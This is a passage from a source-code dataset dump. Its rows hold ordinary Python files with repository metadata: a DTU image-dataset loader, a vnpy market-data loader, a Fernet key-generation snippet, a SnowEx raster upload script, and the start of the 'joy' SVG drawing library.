field (dict): datafield
'''
resize_img_transform = ResizeImage(cfg['dataloading']['img_size'])
all_images = mode == 'render'
random_view = True if (
mode == 'train'
) else False
n_views = cfg['dataloading']['n_views']
fields = {}
if mode in ('train', 'val', 'render', 'test'):
img_field = ImagesField(
'image',
mask_folder_name='mask',
transform=resize_img_transform,
extension='png',
mask_extension='png',
with_camera=True,
with_mask=with_mask,
random_view=random_view,
dataset_name='DTU',
all_images=all_images,
n_views=n_views,
ignore_image_idx=cfg['dataloading']['ignore_image_idx'],
)
fields['img'] = img_field
return fields
class ResizeImage(object):
''' Resize image transformation class.
It resizes an image and transforms it to a PyTorch tensor.
Args:
img_size (int or tuple): resized image size
'''
def __init__(self, img_size):
if img_size is None:
self.transform = transforms.Compose([
transforms.ToTensor()])
else:
self.transform = transforms.Compose([
transforms.Resize(img_size),
transforms.ToTensor()])
def __call__(self, img):
img = self.transform(img)
return img
class Shapes3dDataset(data.Dataset):
'''Dataset class for image data of one 3D shape
Dataset class that includes caching
'''
def __init__(self, dataset_folder, fields, split=None,
categories=None, no_except=True, transform=None,
shared_dict={}, n_views=24, cache_fields=False,
split_model_for_images=False):
''' Initialization of the the 3D shape dataset.
Args:
dataset_folder (str): dataset folder
fields (dict): dictionary of fields
split (str): which split is used
categories (list): list of categories to use
no_except (bool): no exception
transform (callable): transformation applied to data points
shared_dict (dict): shared dictionary (used for field caching)
n_views (int): number of views (only relevant when using field
caching)
cache_fields(bool): whether to cache fields; this option can be
useful for small overfitting experiments
split_model_for_images (bool): whether to split a model by its
views
'''
# Attributes
self.dataset_folder = dataset_folder
self.fields = fields
self.no_except = no_except
self.transform = transform
self.cache_fields = cache_fields
self.n_views = n_views
self.cached_fields = shared_dict
self.split_model_for_images = split_model_for_images
if split_model_for_images:
assert(n_views > 0)
print('You are splitting the models by images. Make sure that you entered the correct number of views.')
# If categories is None, use all subfolders
if categories is None:
categories = os.listdir(dataset_folder)
categories = [c for c in categories
if os.path.isdir(os.path.join(dataset_folder, c))]
categories.sort()
# Read metadata file
metadata_file = os.path.join(dataset_folder, 'metadata.yaml')
if os.path.exists(metadata_file):
with open(metadata_file, 'r') as f:
self.metadata = yaml.load(f)
else:
self.metadata = {
c: {'id': c, 'name': 'n/a'} for c in categories
}
# Set index
for c_idx, c in enumerate(categories):
self.metadata[c]['idx'] = c_idx
# Get all models
self.models = []
for c_idx, c in enumerate(categories):
subpath = os.path.join(dataset_folder, c)
if not os.path.isdir(subpath):
logger.warning('Category %s does not exist in dataset.' % c)
split_file = os.path.join(subpath, str(split) + '.lst')
if not os.path.exists(split_file):
models_c = [f for f in os.listdir(
subpath) if os.path.isdir(os.path.join(subpath, f))]
else:
with open(split_file, 'r') as f:
models_c = f.read().split('\n')
models_c = list(filter(lambda x: len(x) > 0, models_c))
if split_model_for_images:
for m in models_c:
for i in range(n_views):
self.models += [
{'category': c, 'model': m,
'category_id': c_idx, 'image_id': i}
]
else:
self.models += [
{'category': c, 'model': m, 'category_id': c_idx}
for m in models_c
]
def __len__(self):
''' Returns the length of the dataset.
'''
return len(self.models)
def __getitem__(self, idx):
''' Returns an item of the dataset.
Args:
idx (int): ID of data point
'''
category = self.models[idx]['category']
model = self.models[idx]['model']
c_idx = self.metadata[category]['idx']
model_path = os.path.join(self.dataset_folder, category, model)
data = {}
for field_name, field in self.fields.items():
try:
if self.cache_fields:
if self.split_model_for_images:
idx_img = self.models[idx]['image_id']
else:
idx_img = np.random.randint(0, self.n_views)
k = '%s_%s_%d' % (model_path, field_name, idx_img)
if k in self.cached_fields:
field_data = self.cached_fields[k]
#print(k)
else:
field_data = field.load(model_path, idx, c_idx,
input_idx_img=idx_img)
self.cached_fields[k] = field_data
#print('Not cached %s' %k)
else:
if self.split_model_for_images:
idx_img = self.models[idx]['image_id']
field_data = field.load(
model_path, idx, c_idx, idx_img)
else:
field_data = field.load(model_path, idx, c_idx)
except Exception:
if self.no_except:
logger.warn(
'Error occurred when loading field %s of model %s (%s)'
% (field_name, model, category)
)
return None
else:
raise
if isinstance(field_data, dict):
for k, v in field_data.items():
if k is None:
data[field_name] = v
else:
data['%s.%s' % (field_name, k)] = v
else:
data[field_name] = field_data
if self.transform is not None:
data = self.transform(data)
return data
def get_model_dict(self, idx):
return self.models[idx]
def collate_remove_none(batch):
''' Collater that puts each data field into a tensor with outer dimension
batch size.
Args:
batch: batch
'''
batch = list(filter(lambda x: x is not None, batch))
return data.dataloader.default_collate(batch)
def worker_init_fn(worker_id):
''' Worker init function to ensure true randomness.
'''
random_data = os.urandom(4)
base_seed = int.from_bytes(random_data, byteorder="big")
np.random.seed(base_seed + worker_id)
class ImagesField(object):
''' Data field for images, masks and cameras
'''
def __init__(self, folder_name, mask_folder_name='mask',
transform=None, extension='png', mask_extension='png', with_camera=False,
with_mask=False,
random_view=True, all_images=False, n_views=0,
ignore_image_idx=[], **kwargs):
self.folder_name = folder_name
self.mask_folder_name = mask_folder_name
self.transform = transform
self.extension = extension
self.mask_extension = mask_extension
self.random_view = random_view
self.n_views = n_views
self.with_camera = with_camera
self.with_mask = with_mask
self.all_images = all_images
self.ignore_image_idx = ignore_image_idx
def load(self, model_path, idx, category, input_idx_img=None):
''' Loads the field.
Args:
model_path (str): path to model
idx (int): model id
category (int): category id
input_idx_img (int): image id which should be used (this
overwrites any other id). This is used when the fields are
cached.
'''
if self.all_images:
n_files = self.get_number_files(model_path)
data = {}
for input_idx_img in range(n_files):
datai = self.load_field(model_path, idx, category,
input_idx_img)
data['img%d' % input_idx_img] = datai
data['n_images'] = n_files
return data
else:
return self.load_field(model_path, idx, category, input_idx_img)
def get_number_files(self, model_path, ignore_filtering=False):
''' Returns how many views are present for the model.
Args:
model_path (str): path to model
ignore_filtering (bool): whether the image filtering should be
ignored
'''
folder = os.path.join(model_path, self.folder_name)
files = glob.glob(os.path.join(folder, '*.%s' % self.extension))
files.sort()
if not ignore_filtering and len(self.ignore_image_idx) > 0:
files = [files[idx] for idx in range(
len(files)) if idx not in self.ignore_image_idx]
if not ignore_filtering and self.n_views > 0:
files = files[:self.n_views]
return len(files)
def return_idx_filename(self, model_path, folder_name, extension, idx):
''' Loads the "idx" filename from the folder.
Args:
model_path (str): path to model
folder_name (str): name of the folder
extension (str): string of the extension
idx (int): ID of data point
'''
folder = os.path.join(model_path, folder_name)
files = glob.glob(os.path.join(folder, '*.%s' % extension))
files.sort()
if len(self.ignore_image_idx) > 0:
files = [files[idx] for idx in range(
len(files)) if idx not in self.ignore_image_idx]
if self.n_views > 0:
files = files[:self.n_views]
return files[idx]
def load_image(self, model_path, idx, data={}):
''' Loads an image.
Args:
model_path (str): path to model
idx (int): ID of data point
data (dict): data dictionary
'''
filename = self.return_idx_filename(model_path, self.folder_name,
self.extension, idx)
image = Image.open(filename).convert("RGB")
if self.transform is not None:
image = self.transform(image)
if self.with_mask:
filename_m = self.return_idx_filename(
model_path, self.mask_folder_name, self.mask_extension, idx)
mask = np.array(Image.open(filename_m)).astype(np.bool)
mask = mask.reshape(mask.shape[0], mask.shape[1], -1)
mask = mask[:, :, 0]
mask = mask.astype(np.float32)
image = image * mask + (1 - mask) * np.ones_like(image)
data[None] = image
data['idx'] = idx
def load_camera(self, model_path, idx, data={}):
''' Loads an image.
Args:
model_path (str): path to model
idx (int): ID of data point
data (dict): data dictionary
'''
if len(self.ignore_image_idx) > 0:
n_files = self.get_number_files(model_path, ignore_filtering=True)
idx_list = [i for i in range(
n_files) if i not in self.ignore_image_idx]
idx_list.sort()
idx = idx_list[idx]
camera_file = os.path.join(model_path, 'cameras.npz')
camera_dict = np.load(camera_file)
Rt = camera_dict['world_mat_%s' % idx].astype(np.float32)
K = camera_dict['camera_mat_%s' % idx].astype(np.float32)
S = camera_dict.get(
'scale_mat_%s' % idx, np.eye(4)).astype(np.float32)
data['world_mat'] = Rt
data['camera_mat'] = K
data['scale_mat'] = S
def load_mask(self, model_path, idx, data={}):
''' Loads an object mask.
Args:
model_path (str): path to model
idx (int): ID of data point
data (dict): data dictionary
'''
filename = self.return_idx_filename(
model_path, self.mask_folder_name, self.mask_extension, idx)
mask = np.array(Image.open(filename)).astype(np.bool)
mask = mask.reshape(mask.shape[0], mask.shape[1], -1)[:, :, 0]
data['mask'] = mask.astype(np.float32)
def load_field(self, model_path, idx, category, input_idx_img=None):
''' Loads the data point.
Args:
model_path (str): path to model
idx (int): ID of data point
category (int): index of category
input_idx_img (int): image id which should be used (this
overwrites any other id). This is used when the fields are
cached.
'''
if input_idx_img is not None:
idx_img = input_idx_img
elif self.random_view:
n_files = self.get_number_files(model_path)
idx_img = random.randint(0, n_files - 1)
else:
idx_img = 0
# Load the data
data = {}
self.load_image(model_path, idx_img, data)
if self.with_camera:
self.load_camera(model_path, idx_img, data)
if self.with_mask:
self.load_mask(model_path, idx_img, data)
return data
def check_complete(self, files):
''' Check if field is complete.
Args:
files: files
'''
complete = (self.folder_name in files)
return complete | 33.415686 | 116 | 0.556801 |
acfb4451601142ef1d3625aad811ee21a9d386f3 | 6,028 | py | Python | vnpy/app/pytdx_loader/engine.py | zskycode/vnpy | 441de3ede2e3001661dfc030c8cbe1c860257f56 | [
"MIT"
] | null | null | null | vnpy/app/pytdx_loader/engine.py | zskycode/vnpy | 441de3ede2e3001661dfc030c8cbe1c860257f56 | [
"MIT"
] | null | null | null | vnpy/app/pytdx_loader/engine.py | zskycode/vnpy | 441de3ede2e3001661dfc030c8cbe1c860257f56 | [
"MIT"
] | null | null | null | import time
import pandas as pd
from datetime import datetime
from vnpy.app.pytdx_loader.my_pytdx.constant import KBarType, FutureMarketCode
from vnpy.app.pytdx_loader.my_pytdx.extension_api import ExhqAPI
from vnpy.app.pytdx_loader.my_pytdx.ips import IPsSource
from vnpy.event import EventEngine
from vnpy.trader.constant import Exchange, Interval
from vnpy.trader.database import get_database
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.object import BarData
from vnpy.trader.utility import get_folder_path
APP_NAME = "PytdxLoader"
class PytdxLoaderEngine(BaseEngine):
""""""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super().__init__(main_engine, event_engine, APP_NAME)
self.file_path: str = ""
self.symbol: str = ""
self.exchange: Exchange = Exchange.SSE
self.interval: Interval = Interval.MINUTE
self.datetime_head: str = ""
self.open_head: str = ""
self.close_head: str = ""
self.low_head: str = ""
self.high_head: str = ""
self.volume_head: str = ""
def to_bar_data(self, item,
symbol: str,
exchange: Exchange,
interval: Interval,
datetime_head: str,
open_head: str,
high_head: str,
low_head: str,
close_head: str,
volume_head: str,
open_interest_head: str
):
bar = BarData(
symbol=symbol,
exchange=exchange,
datetime=item[datetime_head].to_pydatetime(),
interval=interval,
volume=item[volume_head],
open_interest=item[open_interest_head],
open_price=item[open_head],
high_price=item[high_head],
low_price=item[low_head],
close_price=item[close_head],
gateway_name="DB"
)
return bar
def load_by_handle(
self,
data,
symbol: str,
exchange: Exchange,
interval: Interval,
datetime_head: str,
open_head: str,
high_head: str,
low_head: str,
close_head: str,
volume_head: str,
open_interest_head: str,
datetime_format: str,
progress_bar_dict:dict,
opt_str: str
):
start_time = time.time()
if isinstance(data[datetime_head][0], str):
data[datetime_head] = data[datetime_head].apply(
lambda x: datetime.strptime(x, datetime_format) if datetime_format else datetime.fromisoformat(x))
elif isinstance(data[datetime_head][0], pd.Timestamp):
self.main_engine.write_log("datetime 格式为 pd.Timestamp, 不用处理.")
else:
self.main_engine.write_log("未知datetime类型, 请检查")
self.main_engine.write_log(f'df apply 处理日期时间 cost {time.time() - start_time:.2f}s')
if opt_str == "to_db":
start_time = time.time()
bars = data.apply(
self.to_bar_data,
args=(
symbol,
exchange,
interval,
datetime_head,
open_head,
high_head,
low_head,
close_head,
volume_head,
open_interest_head
),
axis=1).tolist()
self.main_engine.write_log(f'df apply 处理bars时间 cost {time.time() - start_time:.2f}s')
# insert into database
get_database().save_bar_data(bars, progress_bar_dict)
elif opt_str == "to_csv":
csv_file_dir = get_folder_path("csv_files")
data.to_csv(f'{csv_file_dir}/{exchange.value}_{symbol}.csv', index=False)
start = data[datetime_head].iloc[0]
end = data[datetime_head].iloc[-1]
count = len(data)
return start, end, count
def load(
self,
symbol: str,
exchange: Exchange,
interval: Interval,
datetime_head: str,
open_head: str,
high_head: str,
low_head: str,
close_head: str,
volume_head: str,
open_interest_head: str,
datetime_format: str,
progress_bar_dict: dict,
opt_str: str,
):
"""
load by filename %m/%d/%Y
"""
# data = pd.read_csv(file_path)
ip, port = IPsSource().get_fast_exhq_ip()
ex_api = ExhqAPI()
with ex_api.connect(ip, port):
params_dict = {
"category": KBarType[interval.name].value,
"market": FutureMarketCode[exchange.value].value,
"code": symbol,
}
data_df = ex_api.get_all_KBars_df(**params_dict)
# transform column name to vnpy format
data_df.rename(
columns={
"datetime": "Datetime",
"open": "Open",
"high": "High",
"low": "Low",
"close": "Close",
"position": "OpenInterest",
"trade": "Volume",
},
inplace=True
)
return self.load_by_handle(
data_df,
symbol=symbol,
exchange=exchange,
interval=interval,
datetime_head=datetime_head,
open_head=open_head,
high_head=high_head,
low_head=low_head,
close_head=close_head,
volume_head=volume_head,
open_interest_head=open_interest_head,
datetime_format=datetime_format,
progress_bar_dict=progress_bar_dict,
opt_str=opt_str
) | 32.408602 | 114 | 0.532349 |
acfb4467bf15ad794b3109752cb411ab3fe44815 | 145 | py | Python | Cryptography/GenerateKey.py | DEV-UNT/Advanced-Keylogger | f17023bf139a81fa49f12528cc5b080d40b1775d | [
"Apache-2.0"
] | 1 | 2021-06-07T13:15:51.000Z | 2021-06-07T13:15:51.000Z | Cryptography/GenerateKey.py | DEV-UNT/Advanced-Keylogger | f17023bf139a81fa49f12528cc5b080d40b1775d | [
"Apache-2.0"
] | null | null | null | Cryptography/GenerateKey.py | DEV-UNT/Advanced-Keylogger | f17023bf139a81fa49f12528cc5b080d40b1775d | [
"Apache-2.0"
] | 2 | 2021-06-07T13:15:53.000Z | 2021-06-25T22:15:15.000Z | from cryptography.fernet import Fernet
key = Fernet.generate_key()
file = open("encryption_key.txt", 'wb')
file.write(key)
file.close()
| 18.125 | 40 | 0.710345 |
acfb44954393481a12e54cdc363ea4ef0d1bb13f | 1,841 | py | Python | scripts/upload/add_gm_snow_off.py | SnowEx/snowexsql | 77b89c617ecbd6433c25a7c6eb11f1df25766f0d | [
"BSD-3-Clause"
] | 5 | 2021-05-06T20:57:13.000Z | 2021-11-15T18:04:33.000Z | scripts/upload/add_gm_snow_off.py | SnowEx/snowexsql | 77b89c617ecbd6433c25a7c6eb11f1df25766f0d | [
"BSD-3-Clause"
] | 28 | 2021-05-15T12:30:23.000Z | 2022-02-25T00:07:28.000Z | scripts/upload/add_gm_snow_off.py | hpmarshall/SnowEx2020_SQLcode | 77b89c617ecbd6433c25a7c6eb11f1df25766f0d | [
"BSD-3-Clause"
] | 2 | 2021-05-02T00:46:26.000Z | 2021-05-03T16:35:39.000Z | """
1. To download the data, run sh download_snow_off.sh
2. Run this script.
Usage:
# To run with all the scripts
python run.py
# To run individually
python add_gm_snow_off.py
Spatial Reference Original:
* EPSG:26912 (No reprojection needed)
* Vertical Datum is NAVD 88 (No reprojection needed)
* URL https://www.sciencebase.gov/catalog/file/get/5a54a313e4b01e7be23c09a6?f=__disk__32%2F31%2Fd0%2F3231d0ab78c88fd13cc46066cd03a0a2055276aa&transform=1&allowOpen=true
Citation:
U.S. Geological Survey, 20171101, USGS NED Original Product Resolution CO MesaCo-QL2 2015 12SYJ515455 IMG 2017: U.S. Geological Survey.
"""
import glob
from os.path import abspath, expanduser, join
from snowexsql.batch import UploadRasterBatch
def main():
# Location of the downloaded data
downloads = '~/Downloads/GM_DEM'
# Spatial Reference
epsg = 26912
# Metadata
surveyors = 'USGS'
instrument = 'lidar'
site_name = 'Grand Mesa'
units = 'meters' # Add from the Annotation file
desc = 'US Geological Survey 1m snow off DEM from the 3DEP'
dtype = 'DEM'
# Expand the paths
downloads = abspath(expanduser(downloads))
# error counting
errors_count = 0
# Build metadata that gets copied to all rasters being uploaded
data = {'site_name': site_name,
'description': desc,
'units': units,
'epsg': epsg,
'surveyors': surveyors,
'instrument': instrument,
'tiled': True,
'type': dtype,
'doi': 'https://doi.org/10.3133/fs20203062'
}
# Grab all the geotiff,
files = glob.glob(join(downloads, '*.tif'))
rs = UploadRasterBatch(files, **data)
rs.push()
errors_count += len(rs.errors)
return errors_count
if __name__ == '__main__':
main()
| 25.219178 | 169 | 0.660511 |
acfb4547e92379f6e9ad545cb4b8aa2ff0dcaea5 | 26,448 | py | Python | joy.py | anandology/joy | c0618691c0fd682875ab4f621659a9531149f81d | [
"MIT"
] | null | null | null | joy.py | anandology/joy | c0618691c0fd682875ab4f621659a9531149f81d | [
"MIT"
] | null | null | null | joy.py | anandology/joy | c0618691c0fd682875ab4f621659a9531149f81d | [
"MIT"
] | null | null | null | """
Joy
===
Joy is a tiny creative coding library in Python.
BASIC USAGE
An example of using joy:
>>> from joy import *
>>>
>>> c = circle(x=100, y=100, r=50)
>>> show(c)
The `circle` function creates a new circle and the `show` function
displays it.
PRINCIPLES
Joy follows functional programming approach for its interface. Each
function/class gives a shape and those shapes can be transformed and
combined using other utility functions.
By design, there is no global state in the library.
Joy uses SVG to render the shapes and the shapes are really a very thin
wrapper over SVG nodes. It is possible to use every functionality of SVG,
even if that is not exposed in the API.
COORDINATE SYSTEM
Joy uses a canvas with (0, 0) as the center of the canvas.
By default the size of the canvas is (300, 300).
BASIC SHAPES
Joy supports `circle`, `rectangle` and `line` as basic shapes.
>>> c = circle(x=100, y=100, r=50)
>>> r = rectangle(x=0, y=0, w=200, h=200)
>>> show(c, r)
All basic shapes have default values of all the arguments, making it
easier to start using them.
>>> c = circle()
>>> r = rectangle()
>>> z = line()
>>> show(c, r, z)
COMBINING SHAPES
The `+` operator is used to combine multiple shapes into a
single shape.
>>> shape = circle() + rectangle()
>>> show(shape)
TRANSFORMATIONS
Joy supports `translate`, `rotate` and `scale` transformations.
The `translate` transformation moves the given shape by `x` and `y`.
>>> c1 = circle(r=50)
>>> c2 = c1 | translate(x=100, y=0)
>>> show(c1, c2)
As you've seen the above example, transformations are applied using
the `|` operator.
The `Rotate` transformation rotates a shape anti-clockwise by the specified
angle.
>>> shape = rectangle() | rotate(angle=45)
>>> show(shape)
The `Scale` transformation scales a shape.
>>> shape = circle() | scale(x=1, y=0.5)
>>> show(shape)
HIGER ORDER TRANSFORMATIONS
Joy supports a transform called `repeat` to apply a transformation multiple times
and combining all the resulting shapes.
>>> flower = rectangle() | repeat(18, rotate(10))
>>> show(flower)
JUPYTER LAB INTEGRATION
Joy integrates very well with Jupyter notebooks and every shape is
represented as SVG image by jupyter.
"""
import html
import itertools
import random as random_module
import string
__version__ = "0.2.3"
__author__ = "Anand Chitipothu <anand@fossunited.org>"
SQRT2 = 2**0.5
# Random suffix to avoid conflicts between ids of multiple sketches in the same page
ID_SUFFIX = "".join(random_module.choice(string.ascii_letters+string.digits) for i in range(4))
def shape_sequence():
return (f"s-{i}-{ID_SUFFIX}" for i in itertools.count())
shape_seq = shape_sequence()
class Shape:
"""Shape is the base class for all shapes in Joy.
A Shape is an SVG node and supports converting itself into svg text.
Typically, users do not interact with this class directly, but use it
through its subclasses.
"""
def __init__(self, tag, children=None, transform=None, **attrs):
"""Creates a new shape.
"""
self.tag = tag
self.children = children
self.attrs = attrs
self.transform = None
def get_reference(self):
if not "id" in self.attrs:
self.attrs["id"] = next(shape_seq)
attrs = {"xlink:href": "#" + self.id}
return Shape("use", **attrs)
def __repr__(self):
return f"<{self.tag} {self.attrs}>"
def __getattr__(self, name):
if not name.startswith("_") and name in self.attrs:
return self.attrs[name]
else:
raise AttributeError(name)
def apply_transform(self, transform):
if self.transform is not None:
transform = self.transform | transform
shape = self.clone()
shape.transform = transform
return shape
def clone(self):
shape = object.__new__(self.__class__)
shape.__dict__.update(self.__dict__)
# don't share attrs on clone
# also remove the id as the new nodes gets a new id
shape.attrs = dict(self.attrs)
shape.attrs.pop("id", None)
return shape
def get_attrs(self):
attrs = dict(self.attrs)
if self.transform:
attrs['transform'] = self.transform.as_str()
return attrs
def as_dict(self):
d = self.get_attrs()
d['tag'] = self.tag
if self.children:
d['children'] = [n.as_dict() for n in self.children]
return d
def _svg(self, indent="") -> str:
"""Returns the svg representation of this node.
This method is used to recursively construct the svg of a node
and it's children.
>>> c = Shape(tag='circle', cx=100, cy=100, r=50)
>>> c._svg()
'<circle cx="100" cy="100" r="50" />'
"""
attrs = self.get_attrs()
if self.children:
tag_text = render_tag(self.tag, **attrs, close=False)
return (
indent + tag_text + "\n" +
"".join(c._svg(indent + " ") for c in self.children) +
indent + "</" + self.tag + ">\n"
)
else:
tag_text = render_tag(self.tag, **attrs, close=True)
return indent + tag_text + "\n"
def as_svg(self, width=300, height=300) -> str:
"""Renders this node as svg image.
The svg image is assumed to be of size (300, 300) unless the
width and the height arguments are provided.
Example:
>>> c = Shape(tag='circle', cx=100, cy=100, r=50)
>>> print(c.as_svg())
<svg width="300" height="300" viewBox="-150 -150 300 350" fill="none" stroke="black" xmlns="http://www.w3.org/2000/svg">
<circle cx="100" cy="100" r="50" />
</svg>
"""
return SVG([self], width=width, height=height).render()
def __add__(self, shape):
if not isinstance(shape, Shape):
return NotImplemented
return Group([self, shape])
def _repr_svg_(self):
"""Returns the svg representation of this node.
This method is called by Juputer to render this object as an
svg image.
"""
return self.as_svg()
class SVG:
"""SVG renders any svg element into an svg image.
"""
def __init__(self, nodes, width=300, height=300):
self.nodes = nodes
self.width = width
self.height = height
def render(self):
attrs = {
"tag": "svg",
"width": self.width,
"height": self.height,
"viewBox": f"-{self.width//2} -{self.height//2} {self.width} {self.height}",
"fill": "none",
"stroke": "black",
"xmlns": "http://www.w3.org/2000/svg",
"xmlns:xlink": "http://www.w3.org/1999/xlink"
}
svg_header = render_tag(**attrs)+ "\n"
svg_footer = "</svg>\n"
# flip the y axis so that y grows upwards
node = Group(self.nodes) | Scale(sx=1, sy=-1)
return svg_header + node._svg() + svg_footer
def _repr_svg_(self):
return self.render()
def __str__(self):
return self.render()
def __repr__(self):
return "SVG:{self.nodes}"
class Point:
"""Creates a new Point.
Point represents a point in the coordinate space and it contains
attributes x and y.
>>> p = Point(x=100, y=50)
"""
def __init__(self, x, y):
self.x = x
self.y = y
def __eq__(self, p):
return isinstance(p, Point) \
and p.x == self.x \
and p.y == self.y
def __repr__(self):
return f"Point({self.x}, {self.y})"
class Circle(Shape):
"""Creates a circle shape.
Parameters:
center:
The center point of the circle.
Defaults to Point(0, 0) when not specified.
radius:
The radius of the circle.
Defaults to 100 when not specified.
Examples:
Draw a circle.
>>> c = Circle()
>>> show(c)
Draw a Circle with radius 50.
>>> c = Circle(radius=50)
>>> show(c)
Draw a circle with center at (100, 100) and radius as 50.
>>> c = Circle(center=Point(x=100, y=100), radius=50)
>>> show(c)
When no arguments are specified, it uses (0, 0) as the center and
100 as the radius.
"""
def __init__(self, center=Point(0, 0), radius=100, **kwargs):
self.center = center
self.radius = radius
cx, cy = self.center.x, self.center.y
super().__init__("circle",
cx=cx,
cy=cy,
r=self.radius,
**kwargs)
class Ellipse(Shape):
"""Creates an ellipse shape.
Parameters:
center:
The center point of the ellipse. Defaults to (0, 0) when
not specified.
width:
The width of the ellipse. Defaults to 100 when not
specified.
height:
The height of the ellipse. Defaults to 100 when not
specified.
Examples:
Draw an ellipse with center at origin and width of 200 and height of 100:
>>> r = Ellipse()
>>> show(r)
Draw an ellipse having a width of 100 and a height of 50.
>>> r = Ellipse(width=100, height=50)
>>> show(r)
Draw an ellipse centered at (100, 100) and with a width
of 200 and height of 100.
>>> r = Ellipse(center=Point(x=100, y=100), width=200, height=100)
>>> show(r)
"""
def __init__(self, center=Point(0, 0), width=200, height=100, **kwargs):
self.center = center
self.width = width
self.height = height
cx, cy = self.center.x, self.center.y
rx = width/2
ry = height/2
super().__init__(
tag="ellipse",
cx=cx,
cy=cy,
rx=rx,
ry=ry,
**kwargs)
class Rectangle(Shape):
"""Creates a rectangle shape.
Parameters:
center:
The center point of the rectangle. Defaults to (0, 0) when
not specified.
width:
The width of the rectangle. Defaults to 200 when not
specified.
height:
The height of the rectangle. Defaults to 100 when not
specified.
Examples:
Draw a rectangle:
>>> r = Rectangle()
>>> show(r)
Draw a square.
>>> r = Rectangle(width=200, height=200)
>>> show(r)
Draw a rectangle centered at (100, 100) and with a width
of 200 and height of 100.
>>> r = Rectangle(center=Point(x=100, y=100), width=200, height=100)
>>> show(r)
"""
def __init__(self, center=Point(0, 0), width=200, height=100, **kwargs):
self.center = center
self.width = width
self.height = height
cx, cy = self.center.x, self.center.y
x = cx - width/2
y = cy - height/2
super().__init__(
tag="rect",
x=x,
y=y,
width=width,
height=height,
**kwargs)
class Line(Shape):
"""Basic shape for drawing a line connecting two points.
Parameters:
start:
The starting point of the line. Defaults to (-100, 0) when
not specified.
end:
The ending point of the line. Defaults to (100, 0) when not
specified.
Examples:
Draw a line:
>>> z = line()
>>> show(z)
Draw a line from (0, 0) to (100, 50).
>>> z = line(start=Point(x=0, y=0), end=Point(x=100, y=50))
>>> show(z)
"""
def __init__(self, start=Point(-100, 0), end=Point(100, 0), **kwargs):
self.start = start
self.end = end
x1, y1 = self.start.x, self.start.y
x2, y2 = self.end.x, self.end.y
super().__init__("line", x1=x1, y1=y1, x2=x2, y2=y2, **kwargs)
class Group(Shape):
"""Creates a container to group a list of shapes.
This class is not meant for direct consumption of the users. Users
are recommended to use `combine` to combine multiple shapes and use
`translate`, `rotate` and `scale` for doing transformations.
This creates an svg <g> element.
Parameters:
shapes:
The list of shapes to group.
Examples:
Combine a circle and a rectangle.
>> c = Circle()
>> r = Rectangle()
>>> shape = Group([c, r])
>>> show(shape)
Shapes can also be combined using the + operator and that creates
a group implicitly.
>>> shape = Circle() + Rectangle()
>>> show(shape)
"""
def __init__(self, shapes, **kwargs):
super().__init__("g", children=shapes, **kwargs)
def render_tag(tag, *, close=False, **attrs):
"""Renders a html/svg tag.
>>> render_tag("circle", cx=0, cy=0, r=10)
'<circle cx="0" cy="0" r="10">'
When `close=True`, the tag is closed with "/>".
>>> render_tag("circle", cx=0, cy=0, r=10, close=True)
'<circle cx="0" cy="0" r="10" />'
Underscore characters in the attribute name are replaced with hypens.
>>> render_tag("circle", cx=0, cy=0, r=10, stroke_width=2)
'<circle cx="0" cy="0" r="10" stroke-width="2">'
"""
end = " />" if close else ">"
if attrs:
items = [(k.replace("_", "-"), html.escape(str(v))) for k, v in attrs.items() if v is not None]
attrs_text = " ".join(f'{k}="{v}"' for k, v in items)
return f"<{tag} {attrs_text}{end}"
else:
return f"<{tag}{end}"
class Transformation:
def apply(self, shape):
return shape.apply_transform(self)
def join(self, transformation):
return TransformationList([self, transformation])
def __or__(self, right):
if not isinstance(right, Transformation):
return NotImplemented
return self.join(transformation=right)
def __ror__(self, left):
if not isinstance(left, Shape):
return NotImplemented
return self.apply(shape=left)
class TransformationList(Transformation):
def __init__(self, transformations):
self.transformations = transformations
def join(self, transformation):
return TransformationList(self.transformations + [transformation])
def as_str(self):
# Reversing the transformations as SVG applies them in the
# reverse order (the rightmost is appled first)
return " ".join(t.as_str() for t in self.transformations[::-1])
class Translate(Transformation):
"""Creates a new Translate transformation that moves a shape by
x and y when applied.
Parameters:
x:
The number of units to move in the x direction
y:
The number of units to move in the y direction
Example:
Translate a circle by (100, 50).
>>> c = Circle() | Translate(100, 50)
>>> show(c)
"""
def __init__(self, x, y):
self.x = x
self.y = y
def as_str(self):
return f"translate({self.x} {self.y})"
class Rotate(Transformation):
"""Creates a new rotate transformation.
When applied to a shape, it rotates the given shape by angle, around
the anchor point.
Parameters:
angle:
The angle to rotate the shape in degrees.
anchor:
The anchor point around which the rotation is performed.
Examples:
Rotates a square by 45 degrees.
>>> shape = Rectangle() | Rotate(angle=45)
>>> show(shape)
Rotate a rectangle around its top-left corner and
combine with itself.
>>> r1 = Rectangle()
>>> r2 = r1 | Rotate(angle=45, anchor=(r.point[0]))
>>> shape = combine(r1, r2)
>>> show(shape)
"""
def __init__(self, angle, anchor=Point(0, 0)):
self.angle = angle
self.anchor = anchor
def as_str(self):
origin = Point(0, 0)
if self.anchor == origin:
return f"rotate({self.angle})"
else:
return f"rotate({self.angle} {self.anchor.x} {self.anchor.y})"
class Scale(Transformation):
"""Creates a new scale transformation.
Parameters:
sx:
The scale factor in the x direction.
sy:
The scale factor in the y direction. Defaults to
the value of sx if not provided.
"""
def __init__(self, sx, sy=None):
if sy is None:
sy = sx
self.sx = sx
self.sy = sy
def as_str(self):
return f"scale({self.sx} {self.sy})"
class Repeat(Transformation):
"""Repeat is a higher-order transformation that repeats a
transformation multiple times.
Parameters:
n:
The number of times to rotate. This also determines the
angle of each rotation, which will be 360/n.
transformation:
The transformation to apply repeatedly.
Examples:
Draw three circles:
>>> shape = Circle(radius=25) | Repeat(4, Translate(x=50, y=0))
>>> show(shape)
Rotate a line multiple times:
>>> shape = Line() | Repeat(36, Rotate(angle=10))
>>> show(shape)
Rotate and shrink a line multiple times:
>>> shape = Line() | Repeat(18, Rotate(angle=10) | Scale(sx=0.9))
>>> show(shape)
"""
def __init__(self, n, transformation):
self.n = n
self.transformation = transformation
def apply(self, shape):
ref = shape.get_reference()
defs = Shape("defs", children=[shape])
return defs + self._apply(ref, self.transformation, self.n)
def _apply(self, shape, tf, n):
if n == 1:
return shape
else:
result = self._apply(shape, tf, n-1) | tf
return shape + result
class Cycle(Transformation):
"""
Rotates the given shape repeatedly and combines all the resulting
shapes.
The cycle function is very amazing transformation and it creates
surprising patterns.
Parameters:
n:
The number of times to rotate. This also determines the
angle of each rotation, which will be 360/n.
anchor:
